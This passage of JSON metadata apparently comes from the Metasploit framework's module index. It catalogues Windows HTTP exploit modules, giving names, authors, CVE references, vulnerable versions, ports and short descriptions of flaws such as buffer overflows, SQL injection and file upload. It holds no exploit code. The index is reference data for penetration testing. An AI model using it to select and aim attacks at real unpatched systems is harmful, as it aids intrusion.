"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Apache 2.2 - WebLogic module version 1.0.1136334",
"Windows Apache 2.2 - WebLogic module version 1.0.1150354"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/http/bea_weblogic_jsessionid.rb",
"is_install_path": true,
"ref_name": "windows/http/bea_weblogic_jsessionid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/bea_weblogic_post_bof": {
"name": "Oracle Weblogic Apache Connector POST Request Buffer Overflow",
"full_name": "exploit/windows/http/bea_weblogic_post_bof",
"rank": 500,
"disclosure_date": "2008-07-17",
"type": "exploit",
"author": [
"KingCope",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a stack based buffer overflow in the BEA\n Weblogic Apache plugin.\n\n The connector fails to properly handle specially crafted HTTP POST\n requests, resulting in a buffer overflow due to the insecure usage\n of sprintf. Currently, this module works over Windows systems without DEP,\n and has been tested with Windows 2000 / XP.\n\n In addition, the Weblogic Apache plugin version is fingerprinted with a POST\n request containing a specially crafted Transfer-Encoding header.",
"references": [
"CVE-2008-3257",
"OSVDB-47096",
"BID-30273"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic",
"BEA WebLogic 8.1 SP6 - mod_wl_20.so / Apache 2.0 / Windows [XP/2000]",
"BEA WebLogic 8.1 SP5 - mod_wl_20.so / Apache 2.0 / Windows [XP/2000]",
"BEA WebLogic 8.1 SP4 - mod_wl_20.so / Apache 2.0 / Windows [XP/2000]"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/bea_weblogic_post_bof.rb",
"is_install_path": true,
"ref_name": "windows/http/bea_weblogic_post_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/bea_weblogic_transfer_encoding": {
"name": "BEA Weblogic Transfer-Encoding Buffer Overflow",
"full_name": "exploit/windows/http/bea_weblogic_transfer_encoding",
"rank": 500,
"disclosure_date": "2008-09-09",
"type": "exploit",
"author": [
"pusscat <pusscat@metasploit.com>"
],
"description": "This module exploits a stack based buffer overflow in the BEA\n Weblogic Apache plugin. This vulnerability exists in the\n error reporting for unknown Transfer-Encoding headers.\n You may have to run this twice due to timing issues with handlers.",
"references": [
"CVE-2008-4008",
"OSVDB-49283"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows Apache 2.2 version Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb",
"is_install_path": true,
"ref_name": "windows/http/bea_weblogic_transfer_encoding",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/belkin_bulldog": {
"name": "Belkin Bulldog Plus Web Service Buffer Overflow",
"full_name": "exploit/windows/http/belkin_bulldog",
"rank": 200,
"disclosure_date": "2009-03-08",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Belkin Bulldog Plus\n 4.0.2 build 1219. When sending a specially crafted http request,\n an attacker may be able to execute arbitrary code.",
"references": [
"OSVDB-54395",
"BID-34033",
"EDB-8173"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows XP SP3 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/belkin_bulldog.rb",
"is_install_path": true,
"ref_name": "windows/http/belkin_bulldog",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/ca_arcserve_rpc_authbypass": {
"name": "CA Arcserve D2D GWT RPC Credential Information Disclosure",
"full_name": "exploit/windows/http/ca_arcserve_rpc_authbypass",
"rank": 600,
"disclosure_date": "2011-07-25",
"type": "exploit",
"author": [
"bannedit <bannedit@metasploit.com>",
"rgod"
],
"description": "This module exploits an information disclosure vulnerability in the CA Arcserve\n D2D r15 web server. The information disclosure can be triggered by sending a\n specially crafted RPC request to the homepage servlet. This causes CA Arcserve to\n disclose the username and password in cleartext used for authentication. This\n username and password pair are Windows credentials with Administrator access.",
"references": [
"CVE-2011-3011",
"OSVDB-74162",
"EDB-17574"
],
"platform": "Windows",
"arch": "",
"rport": 8014,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb",
"is_install_path": true,
"ref_name": "windows/http/ca_arcserve_rpc_authbypass",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/ca_igateway_debug": {
"name": "CA iTechnology iGateway Debug Mode Buffer Overflow",
"full_name": "exploit/windows/http/ca_igateway_debug",
"rank": 200,
"disclosure_date": "2005-10-06",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a vulnerability in the Computer Associates\n iTechnology iGateway component. When <Debug>True</Debug> is enabled\n in igateway.conf (non-default), it is possible to overwrite the stack\n and execute code remotely. This module works best with Ordinal payloads.",
"references": [
"CVE-2005-3190",
"OSVDB-19920",
"URL-http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=33485",
"EDB-1243",
"BID-15025"
],
"platform": "Windows",
"arch": "",
"rport": 5250,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"iGateway 3.0.40621.0"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/http/ca_igateway_debug.rb",
"is_install_path": true,
"ref_name": "windows/http/ca_igateway_debug",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/ca_totaldefense_regeneratereports": {
"name": "CA Total Defense Suite reGenerateReports Stored Procedure SQL Injection",
"full_name": "exploit/windows/http/ca_totaldefense_regeneratereports",
"rank": 600,
"disclosure_date": "2011-04-13",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a SQL injection flaw in CA Total Defense Suite R12.\n When supplying a specially crafted soap request to '/UNCWS/Management.asmx', an\n attacker can abuse the reGenerateReports stored procedure by injecting arbitrary SQL\n statements into the ReportIDs element.",
"references": [
"ZDI-11-134",
"OSVDB-74968",
"CVE-2011-1653"
],
"platform": "Windows",
"arch": "",
"rport": 34443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb",
"is_install_path": true,
"ref_name": "windows/http/ca_totaldefense_regeneratereports",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/cogent_datahub_command": {
"name": "Cogent DataHub Command Injection",
"full_name": "exploit/windows/http/cogent_datahub_command",
"rank": 0,
"disclosure_date": "2014-04-29",
"type": "exploit",
"author": [
"John Leitch",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits an injection vulnerability in Cogent DataHub prior\n to 7.3.5. The vulnerability exists in the GetPermissions.asp page, which\n makes insecure use of the datahub_command function with user controlled\n data, allowing execution of arbitrary datahub commands and scripts. This\n module has been tested successfully with Cogent DataHub 7.3.4 on\n Windows 7 SP1. Please also note that after exploitation, the remote service\n will most likely hang and need to be restarted manually.",
"references": [
"ZDI-14-136",
"CVE-2014-3789",
"BID-67486"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Cogent DataHub < 7.3.5"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/cogent_datahub_command.rb",
"is_install_path": true,
"ref_name": "windows/http/cogent_datahub_command",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/cogent_datahub_request_headers_bof": {
"name": "Cogent DataHub HTTP Server Buffer Overflow",
"full_name": "exploit/windows/http/cogent_datahub_request_headers_bof",
"rank": 300,
"disclosure_date": "2013-07-26",
"type": "exploit",
"author": [
"rgod <rgod@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a stack based buffer overflow on Cogent DataHub 7.3.0. The\n vulnerability exists in the HTTP server. While handling HTTP headers, a\n strncpy() function is used in a dangerous way. This module has been tested\n successfully on Cogent DataHub 7.3.0 (Demo) on Windows XP SP3.",
"references": [
"CVE-2013-0680",
"OSVDB-95819",
"BID-53455",
"ZDI-13-178",
"URL-http://www.cogentdatahub.com/Info/130712_ZDI-CAN-1915_Response.html"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows XP SP3 English / Cogent DataHub 7.3.0"
],
"mod_time": "2018-07-09 13:22:08 +0000",
"path": "/modules/exploits/windows/http/cogent_datahub_request_headers_bof.rb",
"is_install_path": true,
"ref_name": "windows/http/cogent_datahub_request_headers_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/coldfusion_fckeditor": {
"name": "ColdFusion 8.0.1 Arbitrary File Upload and Execute",
"full_name": "exploit/windows/http/coldfusion_fckeditor",
"rank": 600,
"disclosure_date": "2009-07-03",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits the Adobe ColdFusion 8.0.1 FCKeditor 'CurrentFolder' File Upload\n and Execute vulnerability.",
"references": [
"CVE-2009-2265",
"OSVDB-55684"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Universal Windows Target"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/coldfusion_fckeditor.rb",
"is_install_path": true,
"ref_name": "windows/http/coldfusion_fckeditor",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/cyclope_ess_sqli": {
"name": "Cyclope Employee Surveillance Solution v6 SQL Injection",
"full_name": "exploit/windows/http/cyclope_ess_sqli",
"rank": 600,
"disclosure_date": "2012-08-08",
"type": "exploit",
"author": [
"loneferret",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a SQL injection found in Cyclope Employee Surveillance\n Solution. Because the login script does not properly handle the user-supplied\n username parameter, a malicious user can manipulate the SQL query, which allows\n arbitrary code execution under the context of 'SYSTEM'.",
"references": [
"OSVDB-84517",
"EDB-20393"
],
"platform": "Windows",
"arch": "",
"rport": 7879,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Cyclope Employee Surveillance Solution v6.2 or older"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/cyclope_ess_sqli.rb",
"is_install_path": true,
"ref_name": "windows/http/cyclope_ess_sqli",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/desktopcentral_file_upload": {
"name": "ManageEngine Desktop Central AgentLogUpload Arbitrary File Upload",
"full_name": "exploit/windows/http/desktopcentral_file_upload",
"rank": 600,
"disclosure_date": "2013-11-11",
"type": "exploit",
"author": [
"Thomas Hibbert <thomas.hibbert@security-assessment.com>"
],
"description": "This module exploits an arbitrary file upload vulnerability in Desktop Central v7 to\n v8 build 80293. A malicious user can upload a JSP file into the web root without\n authentication, leading to arbitrary code execution as SYSTEM.",
"references": [
"CVE-2013-7390",
"OSVDB-100008",
"URL-http://security-assessment.com/files/documents/advisory/Desktop%20Central%20Arbitrary%20File%20Upload.pdf",
"URL-https://seclists.org/fulldisclosure/2013/Nov/130"
],
"platform": "Windows",
"arch": "x86",
"rport": 8020,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Desktop Central v7 - v8 build 80292 / Windows"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/windows/http/desktopcentral_file_upload.rb",
"is_install_path": true,
"ref_name": "windows/http/desktopcentral_file_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/desktopcentral_statusupdate_upload": {
"name": "ManageEngine Desktop Central StatusUpdate Arbitrary File Upload",
"full_name": "exploit/windows/http/desktopcentral_statusupdate_upload",
"rank": 600,
"disclosure_date": "2014-08-31",
"type": "exploit",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "This module exploits an arbitrary file upload vulnerability in ManageEngine DesktopCentral\n v7 to v9 build 90054 (including the MSP versions).\n A malicious user can upload a JSP file into the web root without authentication, leading to\n arbitrary code execution as SYSTEM. Some early builds of version 7 are not exploitable as\n they do not ship with a bundled Java compiler.",
"references": [
"CVE-2014-5005",
"OSVDB-110643",
"URL-https://seclists.org/fulldisclosure/2014/Aug/88"
],
"platform": "Windows",
"arch": "x86",
"rport": 8020,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Desktop Central v7 to v9 build 90054 / Windows"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/windows/http/desktopcentral_statusupdate_upload.rb",
"is_install_path": true,
"ref_name": "windows/http/desktopcentral_statusupdate_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/disk_pulse_enterprise_bof": {
"name": "Disk Pulse Enterprise Login Buffer Overflow",
"full_name": "exploit/windows/http/disk_pulse_enterprise_bof",
"rank": 600,
"disclosure_date": "2016-10-03",
"type": "exploit",
"author": [
"Chris Higgins",
"Tulpa Security"
],
"description": "This module exploits a stack buffer overflow in Disk Pulse Enterprise\n 9.0.34. If a malicious user sends a malicious HTTP login request,\n it is possible to execute a payload that would run under the Windows\n NT AUTHORITY\\SYSTEM account. Due to size constraints, this module\n uses the Egghunter technique.",
"references": [
"EDB-40452"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Disk Pulse Enterprise 9.0.34"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/disk_pulse_enterprise_bof.rb",
"is_install_path": true,
"ref_name": "windows/http/disk_pulse_enterprise_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/disk_pulse_enterprise_get": {
"name": "Disk Pulse Enterprise GET Buffer Overflow",
"full_name": "exploit/windows/http/disk_pulse_enterprise_get",
"rank": 600,
"disclosure_date": "2017-08-25",
"type": "exploit",
"author": [
"Chance Johnson",
"Nipun Jaswal & Anurag Srivastava"
],
"description": "This module exploits an SEH buffer overflow in Disk Pulse Enterprise\n 9.9.16. If a malicious user sends a crafted HTTP GET request\n it is possible to execute a payload that would run under the Windows\n NT AUTHORITY\\SYSTEM account.",
"references": [
"EDB-42560"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Disk Pulse Enterprise 9.9.16"
],
"mod_time": "2017-09-13 11:46:57 +0000",
"path": "/modules/exploits/windows/http/disk_pulse_enterprise_get.rb",
"is_install_path": true,
"ref_name": "windows/http/disk_pulse_enterprise_get",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/diskboss_get_bof": {
"name": "DiskBoss Enterprise GET Buffer Overflow",
"full_name": "exploit/windows/http/diskboss_get_bof",
"rank": 600,
"disclosure_date": "2016-12-05",
"type": "exploit",
"author": [
"vportal",
"Ahmad Mahfouz",
"Gabor Seljan",
"Jacob Robles"
],
"description": "This module exploits a stack-based buffer overflow vulnerability\n in the web interface of DiskBoss Enterprise v7.5.12, v7.4.28, and v8.2.14,\n caused by improper bounds checking of the request path in HTTP GET\n requests sent to the built-in web server. This module has been\n tested successfully on Windows XP SP3 and Windows 7 SP1.",
"references": [
"EDB-40869",
"EDB-42395"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Targeting",
"DiskBoss Enterprise v7.4.28",
"DiskBoss Enterprise v7.5.12",
"DiskBoss Enterprise v8.2.14"
],
"mod_time": "2017-12-08 10:42:43 +0000",
"path": "/modules/exploits/windows/http/diskboss_get_bof.rb",
"is_install_path": true,
"ref_name": "windows/http/diskboss_get_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/disksavvy_get_bof": {
"name": "DiskSavvy Enterprise GET Buffer Overflow",
"full_name": "exploit/windows/http/disksavvy_get_bof",
"rank": 600,
"disclosure_date": "2016-12-01",
"type": "exploit",
"author": [
"vportal",
"Gabor Seljan"
],
"description": "This module exploits a stack-based buffer overflow vulnerability\n in the web interface of DiskSavvy Enterprise v9.1.14 and v9.3.14,\n caused by improper bounds checking of the request path in HTTP GET\n requests sent to the built-in web server. This module has been\n tested successfully on Windows XP SP3 and Windows 7 SP1.",
"references": [
"CVE-2017-6187",
"EDB-40869"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Targeting",
"DiskSavvy Enterprise v9.1.14",
"DiskSavvy Enterprise v9.3.14"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/windows/http/disksavvy_get_bof.rb",
"is_install_path": true,
"ref_name": "windows/http/disksavvy_get_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/disksorter_bof": {
"name": "Disk Sorter Enterprise GET Buffer Overflow",
"full_name": "exploit/windows/http/disksorter_bof",
"rank": 500,
"disclosure_date": "2017-03-15",
"type": "exploit",
"author": [
"Daniel Teixeira"
],
"description": "This module exploits a stack-based buffer overflow vulnerability\n in the web interface of Disk Sorter Enterprise v9.5.12, caused by\n improper bounds checking of the request path in HTTP GET requests\n sent to the built-in web server. This module has been tested\n successfully on Windows 7 SP1 x86.",
"references": [
"CVE-2017-7230"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Disk Sorter Enterprise v9.5.12"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/windows/http/disksorter_bof.rb",
"is_install_path": true,
"ref_name": "windows/http/disksorter_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/dup_scout_enterprise_login_bof": {
"name": "Dup Scout Enterprise Login Buffer Overflow",
"full_name": "exploit/windows/http/dup_scout_enterprise_login_bof",
"rank": 600,
"disclosure_date": "2017-11-14",
"type": "exploit",
"author": [
"Chris Higgins",
"sickness"
],
"description": "This module exploits a stack buffer overflow in Dup Scout Enterprise\n 10.0.18. The buffer overflow exists via the web interface during\n login. This gives NT AUTHORITY\\SYSTEM access.",
"references": [
"CVE-2017-13696",
"EDB-43145"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Dup Scout Enterprise 10.0.18"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/windows/http/dup_scout_enterprise_login_bof.rb",
"is_install_path": true,
"ref_name": "windows/http/dup_scout_enterprise_login_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/dupscts_bof": {
"name": "Dup Scout Enterprise GET Buffer Overflow",
"full_name": "exploit/windows/http/dupscts_bof",
"rank": 500,
"disclosure_date": "2017-03-15",
"type": "exploit",
"author": [
"vportal",
"Daniel Teixeira"
],
"description": "This module exploits a stack-based buffer overflow vulnerability\n in the web interface of Dup Scout Enterprise v9.5.14, caused by\n improper bounds checking of the request path in HTTP GET requests\n sent to the built-in web server. This module has been tested\n successfully on Windows 7 SP1 x86.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Dup Scout Enterprise v9.5.14"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/dupscts_bof.rb",
"is_install_path": true,
"ref_name": "windows/http/dupscts_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/easychatserver_seh": {
"name": "Easy Chat Server User Registeration Buffer Overflow (SEH)",
"full_name": "exploit/windows/http/easychatserver_seh",
"rank": 300,
"disclosure_date": "2017-10-09",
"type": "exploit",
"author": [
"Marco Rivoli",
"Aitezaz Mohsin"
],
"description": "This module exploits a buffer overflow during user registration in Easy Chat Server software.",
"references": [
"EDB-42155"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Easy Chat Server 2.0 to 3.1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/easychatserver_seh.rb",
"is_install_path": true,
"ref_name": "windows/http/easychatserver_seh",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/easyfilesharing_post": {
"name": "Easy File Sharing HTTP Server 7.2 POST Buffer Overflow",
"full_name": "exploit/windows/http/easyfilesharing_post",
"rank": 300,
"disclosure_date": "2017-06-12",
"type": "exploit",
"author": [
"bl4ck h4ck3r",
"Marco Rivoli <marco.rivoli.nvh@gmail.com>"
],
"description": "This module exploits a POST buffer overflow in the Easy File Sharing FTP Server 7.2 software.",
"references": [
"EDB-42186"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Easy File Sharing 7.2 HTTP"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/easyfilesharing_post.rb",
"is_install_path": true,
"ref_name": "windows/http/easyfilesharing_post",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/easyfilesharing_seh": {
"name": "Easy File Sharing HTTP Server 7.2 SEH Overflow",
"full_name": "exploit/windows/http/easyfilesharing_seh",
"rank": 300,
"disclosure_date": "2015-12-02",
"type": "exploit",
"author": [
"Starwarsfan2099 <starwarsfan2099@gmail.com>"
],
"description": "This module exploits a SEH overflow in the Easy File Sharing FTP Server 7.2 software.",
"references": [
"EDB-39008"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Easy File Sharing 7.2 HTTP"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/easyfilesharing_seh.rb",
"is_install_path": true,
"ref_name": "windows/http/easyfilesharing_seh",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/easyftp_list": {
"name": "EasyFTP Server list.html path Stack Buffer Overflow",
"full_name": "exploit/windows/http/easyftp_list",
"rank": 500,
"disclosure_date": "2010-02-18",
"type": "exploit",
"author": [
"ThE g0bL!N",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11\n and earlier. EasyFTP fails to check input size when parsing the 'path' parameter\n supplied to an HTTP GET request, which leads to a stack based buffer overflow.\n EasyFTP allows anonymous access by default; valid credentials are typically\n unnecessary to exploit this vulnerability.\n\n After version 1.7.0.12, this package was renamed \"UplusFtp\".\n\n Due to limited space, as well as difficulties using an egghunter, the use of\n staged, ORD, and/or shell payloads is recommended.",
"references": [
"OSVDB-66614",
"EDB-11500"
],
"platform": "Windows",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows XP SP3 - Easy FTP Server Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/easyftp_list.rb",
"is_install_path": true,
"ref_name": "windows/http/easyftp_list",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_windows/http/edirectory_host": {
"name": "Novell eDirectory NDS Server Host Header Overflow",
"full_name": "exploit/windows/http/edirectory_host",
"rank": 500,
"disclosure_date": "2006-10-21",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Novell eDirectory 8.8.1.\n The web interface does not validate the length of the\n HTTP Host header prior to using the value of that header in an\n HTTP redirect.",
"references": [
"CVE-2006-5478",
"OSVDB-29993",
"BID-20655"
],
"platform": "Windows",
"arch": "",
"rport": 8028,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Novell eDirectory 8.8.1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/edirectory_host.rb",
"is_install_path": true,
"ref_name": "windows/http/edirectory_host",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/edirectory_imonitor": {
"name": "eDirectory 8.7.3 iMonitor Remote Stack Buffer Overflow",
"full_name": "exploit/windows/http/edirectory_imonitor",
"rank": 500,
"disclosure_date": "2005-08-11",
"type": "exploit",
"author": [
"Unknown",
"Matt Olney <scacynwrig@yahoo.com>"
],
"description": "This module exploits a stack buffer overflow in eDirectory 8.7.3\n iMonitor service. This vulnerability was discovered by Peter\n Winter-Smith of NGSSoftware.\n\n NOTE: repeated exploitation attempts may cause eDirectory to crash. It does\n not restart automatically in a default installation.",
"references": [
"CVE-2005-2551",
"OSVDB-18703",
"BID-14548"
],
"platform": "Windows",
"arch": "",
"rport": 8008,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows (ALL) - eDirectory 8.7.3 iMonitor"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/edirectory_imonitor.rb",
"is_install_path": true,
"ref_name": "windows/http/edirectory_imonitor",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/efs_easychatserver_username": {
"name": "EFS Easy Chat Server Authentication Request Handling Buffer Overflow",
"full_name": "exploit/windows/http/efs_easychatserver_username",
"rank": 500,
"disclosure_date": "2007-08-14",
"type": "exploit",
"author": [
"LSO <lso@hushmail.com>",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a stack buffer overflow in EFS Software Easy Chat\n Server versions 2.0 to 3.1. By sending an overly long authentication\n request, an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2004-2466",
"OSVDB-7416",
"OSVDB-106841",
"BID-25328"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Targeting",
"Easy Chat Server 2.0",
"Easy Chat Server 2.1 - 3.1"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/windows/http/efs_easychatserver_username.rb",
"is_install_path": true,
"ref_name": "windows/http/efs_easychatserver_username",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/efs_fmws_userid_bof": {
"name": "Easy File Management Web Server Stack Buffer Overflow",
"full_name": "exploit/windows/http/efs_fmws_userid_bof",
"rank": 300,
"disclosure_date": "2014-05-20",
"type": "exploit",
"author": [
"superkojiman",
"Julien Ahrens",
"TecR0c <roccogiovannicalvi@gmail.com>"
],
"description": "Easy File Management Web Server v4.0 and v5.3 contains a stack buffer\n overflow condition that is triggered as user-supplied input is not\n properly validated when handling the UserID cookie. This may allow a\n remote attacker to execute arbitrary code.",
"references": [
"CVE-2014-3791",
"OSVDB-107241",
"EDB-33610",
"BID-67542",
"URL-http://www.cnnvd.org.cn/vulnerability/show/cv_id/2014050536",
"URL-http://www.web-file-management.com/"
],
"platform": "Windows",
"arch": "x86",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Targeting",
"Efmws 5.3 Universal",
"Efmws 4.0 Universal"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/windows/http/efs_fmws_userid_bof.rb",
"is_install_path": true,
